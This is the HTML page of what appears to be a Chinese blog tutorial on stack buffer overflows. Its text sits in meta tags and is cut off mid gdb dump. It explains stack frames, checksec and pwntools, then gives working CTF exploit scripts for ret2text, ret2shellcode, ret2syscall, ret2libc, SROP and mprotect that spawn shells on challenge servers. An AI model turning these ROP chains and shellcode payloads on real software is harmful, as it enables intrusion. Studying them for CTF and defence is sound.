<!DOCTYPE html><html><head><title> 栈溢出：靶向打击 &middot; Surager</title><!-- Begin Jekyll SEO tag v2.7.1 --><meta name="generator" content="Jekyll v4.1.1" /><meta property="og:title" content="栈溢出：靶向打击" /><meta property="og:locale" content="en_US" /><meta name="description" content="栈溢出 0x0栈基础 堆栈(stack)是一种数据结构。堆栈都是一种数据项按序排列的数据结构，只能在一端(称为栈顶(top))对数据项进行插入和删除。 堆栈对于面向过程的编程语言来说是非常重要的。函数调用经常嵌套，在同一时刻，堆栈中会有多个函数的信息。每个未完成运行的函数占用一个独立的连续区域，称作栈帧。可以说，没有栈就没有函数。 需要注意的是 其操作主要有压栈(push)与出栈(pop)、调用(call)、离开(leave)与返回(ret)等操作。 程序的栈是从进程地址空间的高地址向低地址增长的，数据是从低地址向高地址存放的 。 基本操作： 开栈的基本操作如下： push ebp ;保存旧栈帧的底部,在func执行完成后在pop ebp mov ebp,esp ;设置新栈帧的底部 sub esp,xxx ;设置新栈帧的顶部 . . . 参数入栈时，将参数从右向左依次压入系统栈，然后将当前代码段call指令的下一条指令的地址填入返回地址处，然后去执行call的代码。然后保存ebp，开栈。若函数有返回值，则一般将返回值存入eax，然后leave，ret。这就是函数调用(call)的全过程。 传参 需要注意的是，调用一个函数的时候，需要传参。x86和x64的传参方式有所不同。具体如下: x86: 例如要调用一个read函数，原型为： read(0,&amp;buf,0x100); 那么我们只需要将参数传入栈中，x86平台通过栈传递参数： push 100h ;nbytes push eax ;buf push 0 ;fd call _read x64: x64平台通过寄存器和栈传参，前六个参数分别存入rdi,rsi,rdx,rcx,r8,r9，再多就存入栈中。 mov rdx,100h ;nbytes lea rsi,s1 ;buf mov rdi,0 ;fd call _read 在进行栈溢出时，我们要寻找pop rdi;ret这样的片段进行传参，用到一种叫rop的技术。这里介绍一下一个寻找rop的指令： ROPgadget --binary ./filename --only &quot;pop|ret&quot; ROP(Return Oriented Programming)，其主要思想是在栈缓冲区溢出的基础上，利用程序中已有的小片段( gadgets )来改变某些寄存器或者变量的值，从而控制程序的执行流程。所谓gadgets 就是以 ret 结尾的指令序列，通过这些指令序列，我们可以修改某些地址的内容，方便控制程序的执行流程。 0x10栈溢出 栈溢出指的是程序向栈中某个变量写入的字节数超过了这个变量本身申请的字节数，因而导致栈中与之相邻的变量的值被改变。 栈溢出达到的目的 破坏程序内存结构 执行system(/bin/sh) 执行shellcode 栈溢出思路 找到危险函数： 系统级函数：system、execve 输入函数：read、scanf、gets、vscanf 输出函数(泄露地址)：sprintf、puts、printf 判断填充的padding 1. 计算我们所要操作的地址和所要覆盖的地址的距离 2. IDA静态分析中常见的三种索引方式 a. 相对于栈基地址的索引,通过查看EBP相对偏移获得 char name[32]; [esp+0h] [ebp-28h] ==&gt; 0x28+0x4 b. 相对于栈顶指针的索引,需要加上ESP到EBP的偏移，然后转换为a方式 c. 直接地址索引,相当于直接给出了地址 覆盖内容 1. 覆盖返回地址 2. 覆盖某个变量的值。 利用成功 打开交互，然后cat flag吧。 0x20基本工具 file工具 没啥好说的，主要是看这个文件的属性的，重点关注位数和链接方式（详情请见静态链接,动态链接）： babyrop2: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 2.6.32, BuildID[sha1]=fab931b976ae2ff40aa1f5d1926518a0a31a8fd7, not stripped 如上，ELF——ELF文件，64-bit——64位，dynamically linked——动态链接。 checksec工具 [*] &#39;/mnt/e/wsl/babyrop2&#39; Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) arch：程序位数 RELRO：设置符号重定向表格为只读或在程序启动时就解析并绑定所有动态符号，从而减少对GOT（Global Offset Table）攻击。RELRO为” Partial RELRO”，说明我们对GOT表具有写权限。 Stack：开启则无法直接覆盖EIP让程序任意跳转，跳转后会进行cookie校验；但这项保护可以被绕过 NX：NX即No-eXecute（不可执行）的意思，NX（DEP）的基本原理是将数据所在内存页标识为不可执行，当程序溢出成功转入shellcode时，程序会尝试在数据页面上执行指令，此时CPU就会抛出异常，而不是去执行恶意指令。 PIE：开启在每次程序运行地址都会变化，未开启则返回值括号内是程序的基址（见surager博文《动态链接》） pwntools # Pwntools环境预设 from pwn import * context.arch = &quot;amd64/i386&quot; #指定系统架构 context.terminal = [&quot;tmux,&quot;splitw&quot;,&quot;-h&quot;] #指定分屏终端 context.os = &quot;linux&quot; #context用于预设环境 # 库信息 elf = ELF(&#39;./PWNME&#39;) # ELF载入当前程序的ELF，以获取符号表，代码段，段地址，plt，got信息 libc = ELF(&#39;lib/i386-linux-gnu/libc-2.23.so&#39;) # 载入libc的库，可以通过vmmap查看 /* 首先使用ELF()获取文件的句柄，然后使用这个句柄调用函数,如 &gt;&gt;&gt; e = ELF(&#39;/bin/cat&#39;) &gt;&gt;&gt; print hex(e.address) # 文件装载的基地址 &gt;&gt;&gt; print hex(e.symbols[&#39;write&#39;]) # plt中write函数地址 &gt;&gt;&gt; print hex(e.got[&#39;write&#39;]) # GOT表中write符号的地址 &gt;&gt;&gt; print hex(e.plt[&#39;write&#39;]) # PLT表中write符号的地址 */ # Pwntools通信 p = process(&#39;./pwnme&#39;) # 本地 process与程序交互 r = remote(&#39;exploitme.example.com&#39;,3333) # 远程 # 交互 recv() # 接收数据,一直接收 recv(numb=4096,timeout=default) # 指定接收字节数与超时时间 recvuntil(&quot;111&quot;) # 接收到111结束，可以裁剪，如.[1:4] recbline() # 接收到换行结束 recvline(n) # 接收到n个换行结束 recvall() # 接收到EOF recvrepeat(timeout=default) #接收到EOF或timeout send(data) # 发送数据 sendline(data) # 发送一行数据，在末尾会加\n sendlineafter(delims,data) # 在程序接收到delims再发送data r.send(asm(shellcraft.sh())) # 信息通信交互 r.interactive() # send payload后接收当前的shell # 字符串与地址的转换 p64(),p32() #将字符串转化为ascii字节流 u64(),u32() #将ascii的字节流解包为字符串地址 IDA 自己看书 0x30调试（实例分析） nc——签到 nc是netcat的简写，有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用，被设计为一个简单、可靠的网络工具。 一般其程序为： int main() { system(&quot;/bin/sh&quot;); return 0; } system是执行系统指令，/bin/sh在自己电脑里输入一下就知道是啥了。 相似的函数还有execve(“/bin/sh”,0,0); 实战: surager@KaliWindows:~/wsl$ nc node3.buuoj.cn 27422 cat flag flag{0a7da57a-a356-4745-96a6-87bfc4b5b86c} ret2text——梦开始的地方 通过构造payload=padding+address_system(‘/bin/sh’)来完成漏洞利用 jarvisoj_level0 保护机制： $ checksec level0 Arch: amd64-64-little RELRO: No RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 程序只开启了NX保护。 int callsystem() { return system(&quot;/bin/sh&quot;); } ssize_t vulnerable_function() { char buf; // [rsp+0h] [rbp-80h] return read(0, &amp;buf, 0x200uLL); } int __cdecl main(int argc, const char **argv, const char **envp) { write(1, &quot;Hello, World\n&quot;, 0xDuLL); return vulnerable_function(); } 栈相对于rbp的距离为0x80，而read读入了0x200个字符，存在栈溢出。 padding = ‘a’*0x80+’a’*0x8 然后找到callsystem的地址，填入padding之后： #!/usr/bin/env python from pwn import * context.log_level = &#39;debug&#39; io=remote(&#39;node3.buuoj.cn&#39;,25555) payload=&#39;a&#39;*128+&#39;aaaaaaaa&#39;+p64(0x40059a) io.sendline(payload) io.interactive() surager@KaliWindows:~/wsl$ ./level0.py [+] Opening connection to node3.buuoj.cn on port 29296: Done [*] Switching to interactive mode Hello, World $ cat flag flag{************************************} ciscn_2019_n_1 保护机制： $ checksec ciscn_2019_n_1 Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 程序开启了NX保护。 int func() { int result; // eax __int64 v1; // [rsp+0h] [rbp-30h] float v2; // [rsp+2Ch] [rbp-4h] v2 = 0.0; puts(&quot;Let&#39;s guess the number.&quot;); gets(&amp;v1); if ( v2 == 11.28125 ) result = system(&quot;cat /flag&quot;); else result = puts(&quot;Its value should be 11.28125&quot;); return result; } gets并没有限制读入字符的个数，因此可以覆盖返回地址进行跳转，查看汇编得到system(“cat /flag”);地址 exp: from pwn import * io=remote(&#39;node3.buuoj.cn&#39;,29966) payload=&#39;a&#39;*0x30+&#39;a&#39;*8+p64(0x4006be) io.sendline(payload) io.interactive() ret2shellcode——巧取 ciscn_2019_n_5 保护机制： $ checksec ciscn_2019_n_5 Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments 可以看出，几乎没有开任何保护，而且有可读可写可执行的段。我们可以向RWX段读入shellcode，从而获取shell。 int __cdecl main(int argc, const char **argv, const char **envp) { char text[30]; // [rsp+0h] [rbp-20h] setvbuf(stdout, 0LL, 2, 0LL); puts(&quot;tell me your name&quot;); read(0, name, 0x64uLL); puts(&quot;wow~ nice name!&quot;); puts(&quot;What do you want to say to me?&quot;); gets((__int64)text, (__int64)name); return 0; } 查看变量name，发现在bss段 .bss:0000000000601080 ; char name[100] .bss:0000000000601080 name db 64h dup(?) ; DATA XREF: main+35↑o 我们用gdb在main处下断点，用vmmap查看信息： gdb-peda$ b main Breakpoint 1 at 0x40063e gdb-peda$ r [----------------------------------registers-----------------------------------] RAX: 0x400636 --&gt; 0x20ec8348e5894855 RBX: 0x0 RCX: 0x4006b0 --&gt; 0x41ff894156415741 RDX: 0x7ffffffee1a8 --&gt; 0x7ffffffee3e9 (&quot;LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc&quot;...) RSI: 0x7ffffffee198 --&gt; 0x7ffffffee3cf (&quot;/mnt/e/wsl/ciscn_2019_n_5&quot;) RDI: 0x1 RBP: 0x7ffffffee0b0 --&gt; 0x4006b0 --&gt; 0x41ff894156415741 RSP: 0x7ffffffee090 --&gt; 0x4006b0 --&gt; 0x41ff894156415741 RIP: 0x40063e --&gt; 0xb900200a1b058b48 R8 : 0x7fffff3ecd80 --&gt; 0x0 R9 : 0x7fffff3ecd80 --&gt; 0x0 R10: 0x3 R11: 0x7fffff021ab0 (&lt;__libc_start_main&gt;: push r13) R12: 0x400540 --&gt; 0x89485ed18949ed31 R13: 0x7ffffffee190 --&gt; 0x1 R14: 0x0 R15: 0x0 EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x400636 &lt;main&gt;: push rbp 0x400637 &lt;main+1&gt;: mov rbp,rsp 0x40063a &lt;main+4&gt;: sub rsp,0x20=&gt; 0x40063e &lt;main+8&gt;: mov rax,QWORD PTR [rip+0x200a1b] # 0x601060 &lt;stdout@@GLIBC_2.2.5&gt; 0x400645 &lt;main+15&gt;: mov ecx,0x0 0x40064a &lt;main+20&gt;: mov edx,0x2 0x40064f &lt;main+25&gt;: mov esi,0x0 0x400654 &lt;main+30&gt;: mov rdi,rax [------------------------------------stack-------------------------------------] 0000| 0x7ffffffee090 --&gt; 0x4006b0 --&gt; 0x41ff894156415741 0008| 0x7ffffffee098 --&gt; 0x400540 --&gt; 0x89485ed18949ed31 0016| 0x7ffffffee0a0 --&gt; 0x7ffffffee190 --&gt; 0x1 0024| 0x7ffffffee0a8 --&gt; 0x0 0032| 0x7ffffffee0b0 --&gt; 0x4006b0 --&gt; 0x41ff894156415741 0040| 0x7ffffffee0b8 --&gt; 0x7fffff021b97 (&lt;__libc_start_main+231&gt;: mov edi,eax) 0048| 0x7ffffffee0c0 --&gt; 0x1 0056| 0x7ffffffee0c8 --&gt; 0x7ffffffee198 --&gt; 0x7ffffffee3cf (&quot;/mnt/e/wsl/ciscn_2019_n_5&quot;) [------------------------------------------------------------------------------] Legend: code, data, rodata, value Breakpoint 1, main () at pwn.c:7 gdb-peda$ vmmap 发现bss段： 0x00601000 0x00602000 rwxp /mnt/e/wsl/ciscn_2019_n_5 所以我们直接将shellcode写入bss段然后执行。 #!/usr/bin/env python from pwn import * context(arch=&#39;amd64&#39;,os=&#39;linux&#39;,log_level=&#39;debug&#39;) #注意要设置context io = remote(&#39;node3.buuoj.cn&#39;,26176) bss = 0x601080 io.recvuntil(&#39;name\n&#39;) shellcode = asm(shellcraft.sh()) io.send(shellcode) io.recvuntil(&#39;?\n&#39;) payload = &#39;a&#39;*0x20 + &#39;a&#39;*0x8 + p64(bss) io.sendline(payload) io.interactive() ret2syscall——质的提升 x86的execve函数系统调用号为0xb，x64平台的execve系统调用号为0x3b。用ax寄存器存储系统调用号。相当于传递了一个参数。 StackOverflow_ret2syscall_x64 __int64 sub_400B60() { char buf; // [rsp+0h] [rbp-400h] sub_410390((__int64)&quot;Any last words?&quot;); sub_4498A0(0, &amp;buf, 0x7D0uLL); return sub_40F710((unsigned __int64)&quot;This will be the last thing that you say: %s\n&quot;); } surager@KaliWindows:~/wsl$ ROPgadget --binary ./ret2syscall_x64 --only &quot;syscall&quot; Gadgets information ============================================================ 0x000000000040129c : syscall Unique gadgets found: 1 找到了syscall，可以把/bin/sh读入bss段，然后传给execve，构造execve(“/bin/sh”,0,0);便可以得到shell。 需要注意，构造payload时，当要跳转到一个函数执行时，紧跟着的一个参数是这个函数的返回地址，例如： padding+p64(read_add)+p64(return_add)+p64(0)+p64(bss_add)+p64(0x100) 这个payload会先覆盖返回地址为read的地址，然后将p64(return_add)后面的三个作为参数。read执行完毕之后回到return_add这个地址 exp： #!/usr/bin/env python from pwn import * context.log_level = &#39;debug&#39; io = remote(&#39;118.190.133.9&#39;,20004) elf = ELF(&#39;./ret2syscall_x64&#39;) #可以自动获取文件中的某些地址 pop_rax_add = 0x0000000000415664 pop_rdi_add = 0x0000000000400686 pop_rsi_add = 0x00000000004101f3 pop_rdx_add = 0x00000000004498b5 #这四个地址通过ROPgadget找到 main_add = 0x400B60 read_add = 0x4498AA bss_add = elf.bss() #得到bss的地址 syscall = 0x000000000040129c padding = &#39;a&#39;*0x400 + &#39;a&#39;*0x8 payload1 = padding + p64(pop_rdi_add) + p64(0x0) + p64(pop_rsi_add) + p64(bss_add) + p64(pop_rdx_add) + p64(0x100) + p64(read_add) + p64(main_add) io.recvuntil(&#39;Any last words?\n&#39;) io.sendline(payload1) io.send(&#39;/bin/sh\x00&#39;) payload2 = padding + p64(pop_rdi_add) + p64(bss_add) + p64(pop_rsi_add) + p64(0x0) + p64(pop_rdx_add) + p64(0x0) + p64(pop_rax_add) + p64(0x3b) +p64(syscall) io.recvuntil(&#39;Any last words?\n&#39;) io.sendline(payload2) io.interactive() payload1相当于下面的代码： mov rdi,0 mov rsi,offset bss mov rdx,100h call _read ;构造read(0,&amp;bss,0x100) jmp main ;回到main，准备构造第二次rop 执行完payload1之后回到main函数 payload2相当于下面的代码： mov rdi,offset bss mov rsi,0 mov rdx,0 mov rax,3bh syscall ;因为rax为3b，所以执行execve(&quot;/bin/sh&quot;,0,0) 成功拿到shell $ ls $ cat flag [DEBUG] Sent 0x9 bytes: &#39;cat flag\n&#39; [DEBUG] Received 0x19 bytes: &#39;flag{*******************}&#39; ret2libc——彻底挣脱束缚 StackOverflow_ret2libc 保护机制： $ checksec stackoverflow_ret2libc Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 之后分析程序就懵逼了： int __cdecl main(int argc, const char **argv, const char **envp) { setvbuf(stdin, 0LL, 2, 0LL); setvbuf(stdout, 0LL, 2, 0LL); setvbuf(stderr, 0LL, 2, 0LL); puts(&quot;Please input your ID:&quot;); get_id(); puts(&quot;Done&quot;); return 0; } ssize_t get_id() { char buf; // [rsp+0h] [rbp-20h] return read(0, &amp;buf, 0x50uLL); } 只有这两个能用的，没有/bin/sh，没有system，这时候就需要去libc.so里面找外部函数执行了。 libc.so里面集成了大量的系统级函数，其中就包括system，还包括字符串”/bin/sh”。由于动态链接时共享文件的最终装载地址在编译时是不确定的，所以我们需要泄露出libc的基址从而获取装载的偏移量（确定的）。 利用思路：通过输出函数将got表中的某个函数的地址泄露出来，然后减去libc中对应函数的地址就得到了偏移量，然后再用偏移量加上其他函数在libc中的地址，就得到了其他函数。 exp： #!/usr/bin/env python from pwn import * # context.log_level = &#39;debug&#39; io=remote(&#39;118.190.133.9&#39;,10003 )elf=ELF(&#39;./StackOverflow_ret2libc&#39;) puts_plt=elf.plt[&#39;puts&#39;] puts_got=elf.got[&#39;puts&#39;] main_add=elf.symbols[&#39;main&#39;] padding = &#39;a&#39;*0x20+&#39;a&#39;*0x8 rdi = 0x0000000000400783 payload1 = padding + p64(rdi) + p64(puts_got) +p64(puts_plt) + p64(main_add) io.recvuntil(&quot;Please input your ID:\n&quot;) io.sendline(payload1) leak = u64(io.recv()[0:8]+&#39;\x00\x00&#39;) libc = ELF(&#39;./x64-libc-2.23.so&#39;) offset = leak - libc.symbols[&#39;puts&#39;] sys_add = offset + libc.symbols[&#39;system&#39;] binsh_add = offset + libc.search(&#39;/bin/sh&#39;).next() payload2 = padding + p64(rdi)+ p64(binsh_add) + p64(sys_add) io.recvuntil(&quot;Please input your ID:\n&quot;) io.sendline(payload2) io.interactive() 第一个payload将got表中的puts地址泄露出来，用这个地址减去libc中的puts地址即得到offset。 再用offset加上其他函数的地址就可以得到其他函数的使用权了。 如果没有libc的话可以pip install一个LibcSearcher库用。 https://github.com/lieanu/LibcSearcher 以下内容简略介绍。 SROP SROP(Sigreturn Oriented Programming)于2014年被Vrije Universiteit Amsterdam的Erik Bosman提出，其相关研究Framing Signals — A Return to Portable Shellcode发表在安全顶级会议Oakland 2014上，被评选为当年的Best Student Papers。 ciscn_2019_s_3 因为给了15h，可以直接SROP signed __int64 gadgets() { return 15LL; } 先泄露栈地址，然后用栈把/bin/sh读入execve： #!/usr/bin/env python from pwn import * context(arch=&#39;amd64&#39;,os=&#39;linux&#39;,log_level=&#39;debug&#39;) #io = process(&#39;./ciscn_s_3&#39;) io = remote(&#39;node3.buuoj.cn&#39;,25931) vuln_add = 0x4004ED syscall = 0x400517 gadget = 0x4004DA payload = &#39;/bin/sh\x00&#39;*2+p64(vuln_add)io.send(payload)io.recv(0x20) sh = u64(io.recv(8))-0x118 frame = SigreturnFrame() frame.rax = constants.SYS_execve frame.rdi = sh frame.rsi = 0x0 frame.rdx = 0x0 frame.rsp = sh frame.rip = syscall payload = &#39;/bin/sh\x00&#39;*2 + p64(gadget) + p64(syscall) + str(frame) io.sendline(payload) io.interactive() mprotect使用 int mprotect(const void *start, size_t len, int prot); 含义：从start开始长度为len的内存区的保护属性修改为prot指定的值，prot的值和linux的权限属性值相同。 get_started_3dsctf_2016 get_flag函数在远程根本不能用。 所以另辟蹊径，搜索mprotect函数，可以利用mprotect在bss上面写入可执行权限，之后用read函数在bss上写入shellcode。 payload： #!/usr/bin/env python from pwn import * context.log_level = &#39;debug&#39; io = remote(&#39;node3.buuoj.cn&#39;,28342) elf = ELF(&#39;./get_started_3dsctf_2016&#39;) pop_3_add = 0x0809e4c5 rw_add = 0x080eb000 payload = &#39;a&#39;*0x38 + p32(elf.symbols[&#39;mprotect&#39;]) + p32(pop_3_add) + p32(rw_add) + p32(0x1000) + p32(0x7) + p32(elf.symbols[&#39;read&#39;]) + p32(pop_3_add) + p32(0x0) + p32(0x080ebf80) +p32(0x200) + p32(0x080ebf80) io.sendline(payload) io.sendline(asm(shellcraft.sh(),arch=&#39;i386&#39;,os=&#39;linux&#39;)) io.interactive() 放下狠话：可能还会更。 有了！有了！2020-05-09有后续了！ROP tricks 0xdeadbeef参考文章 [漏洞分析] 栈基础 &amp; 栈溢出 &amp; 栈溢出进阶 https://www.52pojie.cn/thread-974510-1-1.html 栈溢出从入门到入狱 https://aidaip.github.io/binary/2019/03/16/%E6%A0%88%E6%BA%A2%E5%87%BA%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%85%A5%E7%8B%B1.html 栈溢出原理 https://wiki.x10sec.org/pwn/stackoverflow/stackoverflow_basic/ 基本 ROP https://wiki.x10sec.org/pwn/stackoverflow/basic_rop/ 高级ROP https://wiki.x10sec.org/pwn/stackoverflow/advanced_rop/ checksec及其包含的保护机制 https://www.jianshu.com/p/8a9ef7205632" /><meta property="og:description" content="栈溢出 0x0栈基础 堆栈(stack)是一种数据结构。堆栈都是一种数据项按序排列的数据结构，只能在一端(称为栈顶(top))对数据项进行插入和删除。 堆栈对于面向过程的编程语言来说是非常重要的。函数调用经常嵌套，在同一时刻，堆栈中会有多个函数的信息。每个未完成运行的函数占用一个独立的连续区域，称作栈帧。可以说，没有栈就没有函数。 需要注意的是 其操作主要有压栈(push)与出栈(pop)、调用(call)、离开(leave)与返回(ret)等操作。 程序的栈是从进程地址空间的高地址向低地址增长的，数据是从低地址向高地址存放的 。 基本操作： 开栈的基本操作如下： push ebp ;保存旧栈帧的底部,在func执行完成后在pop ebp mov ebp,esp ;设置新栈帧的底部 sub esp,xxx ;设置新栈帧的顶部 . . . 参数入栈时，将参数从右向左依次压入系统栈，然后将当前代码段call指令的下一条指令的地址填入返回地址处，然后去执行call的代码。然后保存ebp，开栈。若函数有返回值，则一般将返回值存入eax，然后leave，ret。这就是函数调用(call)的全过程。 传参 需要注意的是，调用一个函数的时候，需要传参。x86和x64的传参方式有所不同。具体如下: x86: 例如要调用一个read函数，原型为： read(0,&amp;buf,0x100); 那么我们只需要将参数传入栈中，x86平台通过栈传递参数： push 100h ;nbytes push eax ;buf push 0 ;fd call _read x64: x64平台通过寄存器和栈传参，前六个参数分别存入rdi,rsi,rdx,rcx,r8,r9，再多就存入栈中。 mov rdx,100h ;nbytes lea rsi,s1 ;buf mov rdi,0 ;fd call _read 在进行栈溢出时，我们要寻找pop rdi;ret这样的片段进行传参，用到一种叫rop的技术。这里介绍一下一个寻找rop的指令： ROPgadget --binary ./filename --only &quot;pop|ret&quot; ROP(Return Oriented Programming)，其主要思想是在栈缓冲区溢出的基础上，利用程序中已有的小片段( gadgets )来改变某些寄存器或者变量的值，从而控制程序的执行流程。所谓gadgets 就是以 ret 结尾的指令序列，通过这些指令序列，我们可以修改某些地址的内容，方便控制程序的执行流程。 0x10栈溢出 栈溢出指的是程序向栈中某个变量写入的字节数超过了这个变量本身申请的字节数，因而导致栈中与之相邻的变量的值被改变。 栈溢出达到的目的 破坏程序内存结构 执行system(/bin/sh) 执行shellcode 栈溢出思路 找到危险函数： 系统级函数：system、execve 输入函数：read、scanf、gets、vscanf 输出函数(泄露地址)：sprintf、puts、printf 判断填充的padding 1. 计算我们所要操作的地址和所要覆盖的地址的距离 2. IDA静态分析中常见的三种索引方式 a. 相对于栈基地址的索引,通过查看EBP相对偏移获得 char name[32]; [esp+0h] [ebp-28h] ==&gt; 0x28+0x4 b. 相对于栈顶指针的索引,需要加上ESP到EBP的偏移，然后转换为a方式 c. 直接地址索引,相当于直接给出了地址 覆盖内容 1. 覆盖返回地址 2. 覆盖某个变量的值。 利用成功 打开交互，然后cat flag吧。 0x20基本工具 file工具 没啥好说的，主要是看这个文件的属性的，重点关注位数和链接方式（详情请见静态链接,动态链接）： babyrop2: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 2.6.32, BuildID[sha1]=fab931b976ae2ff40aa1f5d1926518a0a31a8fd7, not stripped 如上，ELF——ELF文件，64-bit——64位，dynamically linked——动态链接。 checksec工具 [*] &#39;/mnt/e/wsl/babyrop2&#39; Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) arch：程序位数 RELRO：设置符号重定向表格为只读或在程序启动时就解析并绑定所有动态符号，从而减少对GOT（Global Offset Table）攻击。RELRO为” Partial RELRO”，说明我们对GOT表具有写权限。 Stack：开启则无法直接覆盖EIP让程序任意跳转，跳转后会进行cookie校验；但这项保护可以被绕过 NX：NX即No-eXecute（不可执行）的意思，NX（DEP）的基本原理是将数据所在内存页标识为不可执行，当程序溢出成功转入shellcode时，程序会尝试在数据页面上执行指令，此时CPU就会抛出异常，而不是去执行恶意指令。 PIE：开启在每次程序运行地址都会变化，未开启则返回值括号内是程序的基址（见surager博文《动态链接》） pwntools # Pwntools环境预设 from pwn import * context.arch = &quot;amd64/i386&quot; #指定系统架构 context.terminal = [&quot;tmux,&quot;splitw&quot;,&quot;-h&quot;] #指定分屏终端 context.os = &quot;linux&quot; #context用于预设环境 # 库信息 elf = ELF(&#39;./PWNME&#39;) # ELF载入当前程序的ELF，以获取符号表，代码段，段地址，plt，got信息 libc = ELF(&#39;lib/i386-linux-gnu/libc-2.23.so&#39;) # 载入libc的库，可以通过vmmap查看 /* 首先使用ELF()获取文件的句柄，然后使用这个句柄调用函数,如 &gt;&gt;&gt; e = ELF(&#39;/bin/cat&#39;) &gt;&gt;&gt; print hex(e.address) # 文件装载的基地址 &gt;&gt;&gt; print hex(e.symbols[&#39;write&#39;]) # plt中write函数地址 &gt;&gt;&gt; print hex(e.got[&#39;write&#39;]) # GOT表中write符号的地址 &gt;&gt;&gt; print hex(e.plt[&#39;write&#39;]) # PLT表中write符号的地址 */ # Pwntools通信 p = process(&#39;./pwnme&#39;) # 本地 process与程序交互 r = remote(&#39;exploitme.example.com&#39;,3333) # 远程 # 交互 recv() # 接收数据,一直接收 recv(numb=4096,timeout=default) # 指定接收字节数与超时时间 recvuntil(&quot;111&quot;) # 接收到111结束，可以裁剪，如.[1:4] recbline() # 接收到换行结束 recvline(n) # 接收到n个换行结束 recvall() # 接收到EOF recvrepeat(timeout=default) #接收到EOF或timeout send(data) # 发送数据 sendline(data) # 发送一行数据，在末尾会加\n sendlineafter(delims,data) # 在程序接收到delims再发送data r.send(asm(shellcraft.sh())) # 信息通信交互 r.interactive() # send payload后接收当前的shell # 字符串与地址的转换 p64(),p32() #将字符串转化为ascii字节流 u64(),u32() #将ascii的字节流解包为字符串地址 IDA 自己看书 0x30调试（实例分析） nc——签到 nc是netcat的简写，有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用，被设计为一个简单、可靠的网络工具。 一般其程序为： int main() { system(&quot;/bin/sh&quot;); return 0; } system是执行系统指令，/bin/sh在自己电脑里输入一下就知道是啥了。 相似的函数还有execve(“/bin/sh”,0,0); 实战: surager@KaliWindows:~/wsl$ nc node3.buuoj.cn 27422 cat flag flag{0a7da57a-a356-4745-96a6-87bfc4b5b86c} ret2text——梦开始的地方 通过构造payload=padding+address_system(‘/bin/sh’)来完成漏洞利用 jarvisoj_level0 保护机制： $ checksec level0 Arch: amd64-64-little RELRO: No RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 程序只开启了NX保护。 int callsystem() { return system(&quot;/bin/sh&quot;); } ssize_t vulnerable_function() { char buf; // [rsp+0h] [rbp-80h] return read(0, &amp;buf, 0x200uLL); } int __cdecl main(int argc, const char **argv, const char **envp) { write(1, &quot;Hello, World\n&quot;, 0xDuLL); return vulnerable_function(); } 栈相对于rbp的距离为0x80，而read读入了0x200个字符，存在栈溢出。 padding = ‘a’*0x80+’a’*0x8 然后找到callsystem的地址，填入padding之后： #!/usr/bin/env python from pwn import * context.log_level = &#39;debug&#39; io=remote(&#39;node3.buuoj.cn&#39;,25555) payload=&#39;a&#39;*128+&#39;aaaaaaaa&#39;+p64(0x40059a) io.sendline(payload) io.interactive() surager@KaliWindows:~/wsl$ ./level0.py [+] Opening connection to node3.buuoj.cn on port 29296: Done [*] Switching to interactive mode Hello, World $ cat flag flag{************************************} ciscn_2019_n_1 保护机制： $ checksec ciscn_2019_n_1 Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 程序开启了NX保护。 int func() { int result; // eax __int64 v1; // [rsp+0h] [rbp-30h] float v2; // [rsp+2Ch] [rbp-4h] v2 = 0.0; puts(&quot;Let&#39;s guess the number.&quot;); gets(&amp;v1); if ( v2 == 11.28125 ) result = system(&quot;cat /flag&quot;); else result = puts(&quot;Its value should be 11.28125&quot;); return result; } gets并没有限制读入字符的个数，因此可以覆盖返回地址进行跳转，查看汇编得到system(“cat /flag”);地址 exp: from pwn import * io=remote(&#39;node3.buuoj.cn&#39;,29966) payload=&#39;a&#39;*0x30+&#39;a&#39;*8+p64(0x4006be) io.sendline(payload) io.interactive() ret2shellcode——巧取 ciscn_2019_n_5 保护机制： $ checksec ciscn_2019_n_5 Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments 可以看出，几乎没有开任何保护，而且有可读可写可执行的段。我们可以向RWX段读入shellcode，从而获取shell。 int __cdecl main(int argc, const char **argv, const char **envp) { char text[30]; // [rsp+0h] [rbp-20h] setvbuf(stdout, 0LL, 2, 0LL); puts(&quot;tell me your name&quot;); read(0, name, 0x64uLL); puts(&quot;wow~ nice name!&quot;); puts(&quot;What do you want to say to me?&quot;); gets((__int64)text, (__int64)name); return 0; } 查看变量name，发现在bss段 .bss:0000000000601080 ; char name[100] .bss:0000000000601080 name db 64h dup(?) ; DATA XREF: main+35↑o 我们用gdb在main处下断点，用vmmap查看信息： gdb-peda$ b main Breakpoint 1 at 0x40063e gdb-peda$ r [----------------------------------registers-----------------------------------] RAX: 0x400636 --&gt; 0x20ec8348e5894855 RBX: 0x0 RCX: 0x4006b0 --&gt; 0x41ff894156415741 RDX: 0x7ffffffee1a8 --&gt; 0x7ffffffee3e9 